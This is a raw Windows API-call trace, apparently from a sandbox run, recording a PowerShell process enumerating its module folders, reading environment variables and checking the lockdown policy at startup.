	[0058.207] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.207] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.241] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff
	[0058.245] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff
	[0058.288] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdd630
	[0058.288] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbdd630, nSize=0x10a | out: lpBuffer="\x1390\x147e\x7ffc") returned 0x0
	[0058.288] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.289] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdd630
	[0058.289] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbdd630, nSize=0x10a | out: lpBuffer="\x1390\x147e\x7ffc") returned 0x0
	[0058.289] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.289] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd6150
	[0058.289] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbd6150 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.289] CoTaskMemFree (pv=0x1505fbd6150) 
	[0058.289] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.289] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18def8 | out: TokenHandle=0x184c18def8*=0x898) returned 1
	[0058.290] GetTokenInformation (in: TokenHandle=0x898, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18dff8 | out: TokenInformation=0x0, ReturnLength=0x184c18dff8) returned 0
	[0058.290] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9aaa0
	[0058.290] GetTokenInformation (in: TokenHandle=0x898, TokenInformationClass=0x1, TokenInformation=0x1505fc9aaa0, TokenInformationLength=0x2c, ReturnLength=0x184c18dff8 | out: TokenInformation=0x1505fc9aaa0, ReturnLength=0x184c18dff8) returned 1
	[0058.290] LocalFree (hMem=0x1505fc9aaa0) returned 0x0
	[0058.290] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047b3d830, cbSid=0x184c18dff0 | out: pSid=0x15047b3d830*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18dff0) returned 1
	[0058.291] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18de90*=0x89c, lpdwindex=0x184c18dc64 | out: lpdwindex=0x184c18dc64) returned 0x0
	[0058.291] CoTaskMemAlloc (cb=0x218) returned 0x1505fbda110
	[0058.291] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbda110, nSize=0x10a | out: lpBuffer="\xe9fa\x46fe\x150") returned 0x0
	[0058.291] CoTaskMemFree (pv=0x1505fbda110) 
	[0058.291] CoCreateGuid (in: pguid=0x184c18e008 | out: pguid=0x184c18e008*(Data1=0xe21546ec, Data2=0x2752, Data3=0x4ae8, Data4=([0]=0x99, [1]=0xab, [2]=0x52, [3]=0x62, [4]=0x4, [5]=0x8d, [6]=0x32, [7]=0x1e))) returned 0x0
	[0058.292] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8a0
	[0058.292] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0058.296] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18db68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18db68*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x60, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.296] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18da70*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18da70*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x29, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.296] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18db48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x60, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18db48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x60, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.299] CoTaskMemAlloc (cb=0x218) returned 0x1505fbda990
	[0058.299] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbda990, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.299] CoTaskMemFree (pv=0x1505fbda990) 
	[0058.302] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9010
	[0058.302] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbd9010, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.302] CoTaskMemFree (pv=0x1505fbd9010) 
	[0058.307] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff
	[0058.311] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff
	[0058.313] ReadFile (in: hFile=0x8b4, lpBuffer=0x15047bd1920, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d278, lpOverlapped=0x0 | out: lpBuffer=0x15047bd1920*, lpNumberOfBytesRead=0x184c18d278*=0x1000, lpOverlapped=0x0) returned 1
	[0058.317] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff
	[0058.320] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff
	[0058.322] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.324] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 1
	[0058.327] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 1
	[0058.329] FindNextFileW (in: hFindFile=0x1505fc88f10, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 1
	[0058.331] FindNextFileW (in: hFindFile=0x1505fc88f10, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.334] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 0
	[0058.337] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x184c18d060 | out: lpFindFileData=0x184c18d060) returned 0x1505fc884f0
	[0058.340] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x184c18d000 | out: lpFindFileData=0x184c18d000) returned 0x1505fc884f0
	[0058.342] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x184c18d060 | out: lpFindFileData=0x184c18d060) returned 0x1505fc884f0
	[0058.347] FindNextFileW (in: hFindFile=0x1505fc88bb0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.349] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 1
	[0058.351] FindNextFileW (in: hFindFile=0x1505fc88f10, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.355] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.357] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.361] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.363] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice\\pcsvdevice.psd1")) returned 0x20
	[0058.369] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 0
	[0058.373] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\*", lpFindFileData=0x184c18d000 | out: lpFindFileData=0x184c18d000) returned 0x1505fc88f10
	[0058.375] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x184c18d060 | out: lpFindFileData=0x184c18d060) returned 0x1505fc884f0
	[0058.377] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 1
	[0058.380] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\*", lpFindFileData=0x184c18d000 | out: lpFindFileData=0x184c18d000) returned 0x1505fc884f0
	[0058.382] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.385] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x184c18d1f0 | out: lpFindFileData=0x184c18d1f0) returned 0x1505fc88af0
	[0058.387] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdadd0
	[0058.387] GetSystemDirectoryW (in: lpBuffer=0x1505fbdadd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0058.387] CoTaskMemFree (pv=0x1505fbdadd0) 
	[0058.387] WldpGetLockdownPolicy () returned 0x0
	[0058.387] GetSystemInfo (in: lpSystemInfo=0x184c18d4a0 | out: lpSystemInfo=0x184c18d4a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0058.387] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d3a8 | out: phkResult=0x184c18d3a8*=0x8b4) returned 0x0
	[0058.388] RegQueryValueExW (in: hKey=0x8b4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d3f8, lpData=0x0, lpcbData=0x184c18d3f0*=0x0 | out: lpType=0x184c18d3f8*=0x0, lpData=0x0, lpcbData=0x184c18d3f0*=0x0) returned 0x2
	[0058.388] RegCloseKey (hKey=0x8b4) returned 0x0
	[0058.388] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18d228*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18d228*=0) returned 0x0
	[0058.392] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd9010
	[0058.392] GetSystemDirectoryW (in: lpBuffer=0x1505fbd9010, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0058.392] CoTaskMemFree (pv=0x1505fbd9010) 
	[0058.393] WldpGetLockdownPolicy () returned 0x0
	[0058.393] GetSystemInfo (in: lpSystemInfo=0x184c18d300 | out: lpSystemInfo=0x184c18d300*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0058.393] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d208 | out: phkResult=0x184c18d208*=0x8b8) returned 0x0
	[0058.393] RegQueryValueExW (in: hKey=0x8b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d258, lpData=0x0, lpcbData=0x184c18d250*=0x0 | out: lpType=0x184c18d258*=0x0, lpData=0x0, lpcbData=0x184c18d250*=0x0) returned 0x2
	[0058.393] RegCloseKey (hKey=0x8b8) returned 0x0
	[0058.393] CloseHandle (hObject=0x8b4) returned 1
	[0058.394] CoCreateGuid (in: pguid=0x184c18d3b8 | out: pguid=0x184c18d3b8*(Data1=0x9451d8f6, Data2=0xcb45, Data3=0x4d75, Data4=([0]=0xb8, [1]=0x22, [2]=0x8c, [3]=0x24, [4]=0xb, [5]=0x73, [6]=0xa2, [7]=0x82))) returned 0x0
	[0058.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c3c0) returned 1
	[0058.404] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x184c18c4a0 | out: lpFileInformation=0x184c18c4a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c380) returned 1
	[0058.404] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.dll")) returned 0xffffffff
	[0058.404] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9010
	[0058.404] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbd9010, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.405] CoTaskMemFree (pv=0x1505fbd9010) 
	[0058.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c180) returned 1
	[0058.405] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c260 | out: lpFileInformation=0x184c18c260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c140) returned 1
	[0058.406] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
	[0058.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bd40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c180) returned 1
	[0058.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c260 | out: lpFileInformation=0x184c18c260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c140) returned 1
	[0058.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0058.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c180) returned 1
	[0058.413] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c260 | out: lpFileInformation=0x184c18c260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0058.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c140) returned 1
	[0058.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x184c18bba0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x48
	[0058.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bfe0) returned 1
	[0058.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x184c18c0c0 | out: lpFileInformation=0x184c18c0c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bfa0) returned 1
	[0058.415] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.security\\microsoft.powershell.security.dll")) returned 0xffffffff
	[0058.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x184c18bba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50
	[0058.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bfe0) returned 1
	[0058.416] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x184c18c0c0 | out: lpFileInformation=0x184c18c0c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bfa0) returned 1
	[0058.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c010) returned 1
	[0058.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x184c18bb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50
	[0058.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x184c18baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51
	[0058.416] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x184c18bcb0 | out: lpFindFileData=0x184c18bcb0) returned 0x1505fc87950
	[0058.416] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18bd00 | out: lpFindFileData=0x184c18bd00) returned 1
	[0058.416] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18bd00 | out: lpFindFileData=0x184c18bd00) returned 1
	[0058.417] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18bd00 | out: lpFindFileData=0x184c18bd00) returned 0
	[0058.417] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bf60) returned 1
	[0058.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bf20) returned 1
	[0058.419] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.dll")) returned 0xffffffff
	[0058.419] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd7f10
	[0058.419] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbd7f10 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.420] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.420] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.420] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd6590
	[0058.420] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbd6590, nSize=0x10a | out: lpBuffer="") returned 0x0
	[0058.420] CoTaskMemFree (pv=0x1505fbd6590) 
	[0058.420] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdd630
	[0058.420] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdd630 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.420] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.420] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.420] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.420] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d318 | out: TokenHandle=0x184c18d318*=0x8b4) returned 1
	[0058.420] GetTokenInformation (in: TokenHandle=0x8b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18d418 | out: TokenInformation=0x0, ReturnLength=0x184c18d418) returned 0
	[0058.420] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9a7e0
	[0058.420] GetTokenInformation (in: TokenHandle=0x8b4, TokenInformationClass=0x1, TokenInformation=0x1505fc9a7e0, TokenInformationLength=0x2c, ReturnLength=0x184c18d418 | out: TokenInformation=0x1505fc9a7e0, ReturnLength=0x184c18d418) returned 1
	[0058.420] LocalFree (hMem=0x1505fc9a7e0) returned 0x0
	[0058.421] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047e32380, cbSid=0x184c18d410 | out: pSid=0x15047e32380*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18d410) returned 1
	[0058.421] CreateMutexW (lpMutexAttributes=0x15047e324d0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x8b8
	[0058.421] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18d2b0*=0x8b8, lpdwindex=0x184c18d084 | out: lpdwindex=0x184c18d084) returned 0x0
	[0058.421] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdc970
	[0058.421] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbdc970, nSize=0x10a | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x0
	[0058.421] CoTaskMemFree (pv=0x1505fbdc970) 
